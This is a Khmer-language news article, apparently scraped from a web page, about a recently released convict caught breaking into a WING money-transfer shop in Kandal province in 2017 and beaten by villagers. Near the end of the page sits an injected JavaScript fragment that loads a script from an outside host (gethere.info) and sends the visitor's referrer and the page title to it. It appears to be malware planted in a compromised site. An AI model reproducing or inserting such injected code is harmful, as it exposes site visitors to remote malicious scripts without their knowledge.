Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ដោះលែងពីពន្ធនាគារខេត្តកណ្តាល១សប្តាហ៍ ហ៊ានចូលគាស់ផ្ទះWING ដូរលុយ តែត្រូវទួកសាច់របស់ប្រជាពលរដ្ឋ

ខេត្តកណ្តាល៖ កម្លាំងអធិការនគរបាលស្រុកស្អាងឃាត់ខ្លួនជនសង្ស័យម្នាក់ករណី គាស់ផ្ទះដូរលុយ wing កាលពីវេលាម៉ោង២១ និង១០ នាទី ថ្ងៃទី២៧ខែ មករាឆ្នាំ២០១៧នៅចំណុច ផ្ទះរបស់ឈ្មោះ ជួប សូណា ស្ថិតក្នុងភូមិខ្ពបក្រោម ឃុំខ្ពប ស្រុកស្អាងខេត្ត កណ្តាល។លោកសេង សុជាតិអធិការនគរបាលស្រុកស្អាងបានប្រាប់អោយដឹងថា ជនរងគ្រោះ ឈ្មោះ ជួប សូណាភេទប្រុសអាយុ៣៤ឆ្នាំ ជនជាតិខ្មែរមុខរបរ វេរលុយវីងមានទីលំនៅៗភូមិឃុំកើតហេតុខាងលើ។ ចំណែកជនសង្ស័យឈ្មោះ ទុយ បូរ៉ា ភេទប្រុសអាយុ២៤ឆ្នាំ ជនជាតិ ខ្មែរ មុខរបរ មិនពិតប្រាកដមានទីលំនៅៗភូមិ ព្រៃទទឹង ឃុំខ្ពបស្រុកស្អាងខេត្តកណ្តាល។ (របួសធ្ងន់ដោយសារប្រជាពលរដ្ឋវាយ)

ប្រភពបានប្រាប់ថា នៅថ្ងៃកើតហេតុខាងលើជនរងគ្រោះបានបិតទ្វារចាក់សោរផ្ទះ រួចចេញទៅសែននៅផ្ទះម្តាយបង្កើតក្នុងឃុំត្រើយស្លា ។ហើយបានត្រឡប់មកផ្ទះវិញជួបជនសង្ស័យខាងលើកំពុងធ្វើសកម្មភាពលួចលុយក្នុងបន្ទប់វីងក្នុងផ្ទះរបស់ខ្លួន។ ភ្លាមៗនោះជន រង គ្រោះនិងប្រពន្ធឈ្មោះ ហៀង សុខារដ្ឋបានស្រែកឆោរឡោឡើងថាៈ ចោរចូលផ្ទះរបស់ខ្លួន ពេលនោះប្រជាពលរដ្ឋបានឡោមព័ទ្ធផ្ទះ ជនរងគ្រោះនិងចាប់បានជនសង្ស័យនៅក្នុងផ្ទះ រួចក៍បានវាយទៅលើជនសង្ស័យត្រូវចំក្បាលជាច្រើនកន្លែង។បន្ទាប់មកប្រជាពលរដ្ឋបានយកជនសង្ស័យចេញពីក្នុងផ្ទះជនរងគ្រោះ មកដាក់នៅសំយាបខាងមុខផ្ទះជនរងគ្រោះ ពេលនោះមានប្រជាពលរដ្ឋប្រហែល៥០ នាក់បានវាយទៅលើជនសង្ស័យបន្ថែមទៀត ។ ពេលទទួលបានពត៍មានខាងលើនេះភ្លាមសមត្ថកិច្ចប៉ុស្តិ៍បានអន្តរាគមន៍ដល់កន្លែងកើតហេតុ បញ្ជូនជនសង្ស័យមកព្យាបាលនៅមណ្ឌលសុខភាពឃុំតាលន់ និងបានពិនិត្យឃើញនៅកន្លែងកើតហេតុមានស្នាមគាស់ដំបូលសង្ក័សីនិងមានស្នាមគាស់ពីដានបន្ទប់វីង ។តាមការបញ្ជាក់ពីជនរងគ្រោះបានអះអាងថា៖ ពុំមានបាត់ទ្រព្យសម្បត្តិឡើយ។
**បញ្ជាក់៖
ជនសង្ស័យទើបដោះលែងពីពន្ធនាគារខេត្តកណ្តាលនៅថ្ងែទី២០ខែធ្នូឆ្នាំ២០១៦ ពីបទ អំពើ លួច កាលពីថ្ងែទី២០ខែធ្នូឆ្នាំ២០១៤។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More